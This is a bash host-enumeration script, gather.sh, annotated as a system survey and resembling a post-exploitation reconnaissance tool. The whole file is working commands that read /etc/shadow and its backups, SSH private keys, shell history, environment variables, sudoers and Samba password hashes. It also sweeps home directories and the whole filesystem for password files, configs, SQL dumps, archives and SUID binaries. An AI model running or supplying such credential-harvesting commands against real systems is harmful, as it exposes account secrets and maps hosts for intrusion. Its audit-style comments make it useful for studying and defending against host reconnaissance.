gather.sh
#!/bin/bash -v
# Host survey, part 1: operating system, accounts, storage and sessions.
# The shebang runs bash with -v, so every source line (comments included) is
# echoed as it is read; that echo is what labels each command's output in the
# captured log.
#
# HOME_DIR is the directory the script was started from (pwd), not $HOME. The
# per-user paths in the next section resolve relative to it.
HOME_DIR=`pwd`
echo '******* SYSTEM INFORMATION *******'
# Kernel release, distribution and CPU architecture.
uname -a
lsb_release -a
arch
# Every process with its owner and full command line. Secrets passed as
# command-line arguments show up here.
ps aux
cat /etc/issue
ls /home
# Local account databases. /etc/passwd is world-readable by design.
# /etc/shadow holds the password hashes and is normally readable by root only,
# so an unprivileged read that succeeds points to wrong file permissions.
# Reads of /etc/shadow are a high-signal event for file-access auditing.
cat /etc/passwd
cat /etc/shadow
# Name resolution, login banner and the system-wide cron table.
cat /etc/hosts
cat /etc/resolv.conf
cat /etc/motd
cat /etc/crontab
# Mounted filesystems and their usage (-a includes pseudo filesystems).
mount
df -ah
cat /proc/cpuinfo
cat /proc/meminfo
# Logged-in users, and the identity and groups this script runs as.
w
who -a
id
free -m
ls /etc/init.d/
# Presence and version of a compiler, a database client and an interpreter.
gcc -v
mysql --version
python --version
#perl --version
#ruby -v
# Login history and the kernel ring buffer.
last -a
dmesg
# Checks whether network scanning and relay tools are installed on the host.
which nmap
which nc
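echo '******* USER INFORMATION *******'
#ls -d *
#ls -d .*/
# Host survey, part 2: files and environment of the invoking account.
# HOME_DIR was set from pwd on the first line of the script, so these paths
# only reach an account's files when the script is launched from that
# account's home directory. Each expansion is quoted so that a directory name
# containing spaces or glob characters reaches ls/cat as one argument.
#
# This is the most sensitive part of the output: it contains the SSH private
# key, the hosts this account has connected to (known_hosts) and the keys
# allowed to log in as it (authorized_keys). Treat the captured log as
# credential material.
ls "$HOME_DIR/.ssh"
cat "$HOME_DIR/.ssh/id_rsa"
cat "$HOME_DIR/.ssh/id_rsa.pub"
cat "$HOME_DIR/.ssh/known_hosts"
cat "$HOME_DIR/.ssh/authorized_keys"
# Shell history often holds passwords and tokens typed on the command line.
echo '>>>HISTORY FILE'
cat "$HOME_DIR/.bash_history"
echo '<<< HISTORY FILE'
## find . -type f -print -name 'id_rsa' -o -name 'id_rsa.pub' -o -iname '*password*' -exec cat {} \;
# Shell variables and functions (set) and the exported environment (env).
# Any secret exported into the environment is written to the log here.
set
env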
# Host survey, part 3: interfaces, routes, sockets and firewall state.
echo '******* NETWORK INFORMATION *******'
# All interfaces, including ones that are down.
/sbin/ifconfig -a
# Routing table, then every TCP/UDP socket with numeric addresses and the
# owning program (-p only shows other users' programs when run as root).
netstat -nr
netstat -natup
arp -a
# Firewall rules in restorable and listed form; both normally require root.
/sbin/iptables-save
/sbin/iptables -L
hostname
hostname -f
# Asks an external service for the host's public IP address. With no scheme
# given, curl uses plain HTTP. This is the one command in this section that
# deliberately contacts a third-party host, so it is visible in DNS, proxy and
# egress-firewall logs.
curl --connect-timeout 5 ifconfig.me
# Open network files, without host-name (-n) or port-name (-P) resolution.
lsof -nPi
cat /etc/network/interfaces
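# Host survey, part 4: service and system configuration files. Most cat
# targets exist only on particular distributions or when the named service is
# installed, so "No such file" errors are expected in the output.
echo '******* CONFIGURATION *******'
# World-writable entries under /etc. The awk filter keeps lines whose mode
# string ends in "w" plus one character, which is the other-write bit.
# Symlinks (always lrwxrwxrwx) are dropped. stderr is silenced on ls, because
# ls is the stage that prints the permission-denied noise; the original
# redirect sat on grep and suppressed nothing.
# NOTE(review): where ls appends "." or "+" to the mode string (SELinux context
# or ACL marker), /w.$/ no longer lines up with the other-write bit and
# world-writable entries are missed. Confirm on the distro in question.
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /w.$/' | grep -v lrwx
cat /etc/issue{,.net}
# Account databases again, plus the variants found on other systems.
# /etc/shadow~ is an editor backup copy and /etc/master.passwd is the BSD
# counterpart of shadow. A backup copy does not necessarily carry the
# restrictive mode of the original.
cat /etc/passwd
cat /etc/shadow # (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
# Per-user cron tables; listing another user's table with -u requires root.
# Names are read one per line and quoted, so an unusual entry in /etc/passwd
# is neither word-split nor glob-expanded. crontab's stdin is detached so it
# cannot consume the list of names.
cut -f1 -d: /etc/passwd | while IFS= read -r user; do
  printf '%s\n' "$user"
  crontab -u "$user" -l </dev/null
done
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
# Samba account database, in smbpasswd format (-w, which includes the password
# hashes) and in verbose form (-v). Both require root.
pdbedit -L -w
pdbedit -L -v
# NFS exports, automounter maps and the static mount table.
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;
# sudo policy; normally readable by root only.
cat /etc/sudoers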
# Host survey, part 5: distribution identification. The glob on /etc/*release
# covers the per-distribution release files; the commented list below records
# which file belongs to which distribution.
echo '******* DISTRO *******'
lsb_release -d # Generic for all LSB distros
cat /etc/*release
#/etc/SUSE-release # Novell SUSE
#/etc/redhat-release, /etc/redhat_version # Red Hat
#/etc/fedora-release # Fedora
#/etc/slackware-release, /etc/slackware-version # Slackware
#/etc/debian_release, /etc/debian_version, # Debian
#/etc/mandrake-release # Mandrake
#/etc/sun-release # Sun JDS
#/etc/release # Solaris/Sparc
#/etc/gentoo-release # Gentoo
#/etc/lsb-release # ubuntu
#/etc/rc.conf # arch linux
arch # on OpenBSD sample: OpenBSD.amd64
uname -a # (often hints at it pretty well)
# Package inventory, disabled by the author. Installed versions are what a
# patch-level review would compare against vendor advisories.
#echo '******* Packages ******'
#rpm -qa --last | head
#yum list | grep installed
#dpkg -l
#dpkg -l |grep -i "linux-image"
#pkg_info # FreeBSD
#
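# Host survey, part 6: logs, removable and temporary storage, home-directory
# artefacts, SUID binaries and a filesystem-wide sweep for config and archive
# files. The locate commands depend on an existing locate database.
echo '******* IMPORTANT FILES ******'
# Log inventory (owner, mode, size, mtime); log contents are not read.
find /var/log -type f -exec ls -la {} \;
# Mount points and the shared temp directory, oldest entries first.
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
#ls -alhtr /home
#cd /home/; tree
ls /home/*/.ssh/*
# Double quotes are required here. With single quotes the apostrophe in
# "Home's" closed the string early, the trailing quote re-opened it, and the
# cat line between the two markers was swallowed into the echo argument
# instead of being executed.
echo ">>>Home's scripts"
cat /home/*/*.sh
echo "<<<Home's scripts"
#find /home -type f -iname '*.sh' -print -exec cat {} \;
# The name tests are grouped so that -type f and -print apply to every
# alternative. Ungrouped, -print was bound to the last -o branch only, so only
# '*password*' matches were listed.
find /home -type f \( -name 'id_rsa' -o -name 'id_rsa.pub' -o -iname '*.sh' -o -iname '*password*' \) -print
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
#locate tar | grep [.]tar$
#locate tgz | grep [.]tgz$
#locate sql | grep [.]sql$
# grep patterns are quoted so the shell cannot glob-expand the bracket
# expression against a file in the current directory.
locate settings | grep '[.]php$'
locate config.inc | grep '[.]php$'
ls /home/*/id*
locate .properties | grep '[.]properties' # java config files
locate .xml | grep '[.]xml' # java/.net config files
# SUID inventory over the fixed system directories plus every directory on
# PATH. The original piped PATH through a quoted 'sed s/:/ /g', which the
# shell looked up as a single command name and could not run, so no PATH
# directory was ever searched. PATH is now split on ":" into an array and
# empty elements are skipped. For hardening, compare the resulting list with
# the set of SUID files shipped by the installed packages.
suid_roots=(/sbin /usr/sbin /opt /lib)
IFS=: read -r -a path_dirs <<<"$PATH"
for dir in "${path_dirs[@]}"; do
  if [[ -n "$dir" ]]; then
    suid_roots+=("$dir")
  fi
done
find "${suid_roots[@]}" -perm -4000 # find suids
locate rhosts
# find / -type f -print -name 'id_rsa' -o -iname '*password*' -o -iname '*.sh' -exec cat {} \;
# Filesystem-wide sweep for SQL dumps, config files, VCS metadata directories
# and archives. No action is given, so find's implicit -print covers the whole
# -o chain. Errors are discarded.
find / -nowarn -ignore_readdir_race -iname '*.sql' -o -iname '*.conf' -o -iname '*config*' -o -name '.git' -o -name '.svn' \
  -o -name '*.tar' -o -name '*.gz' -o -name '*.bz2' -o -name '*.zip' -o -name '*.7z' -o -name '*.rar' 2>/dev/null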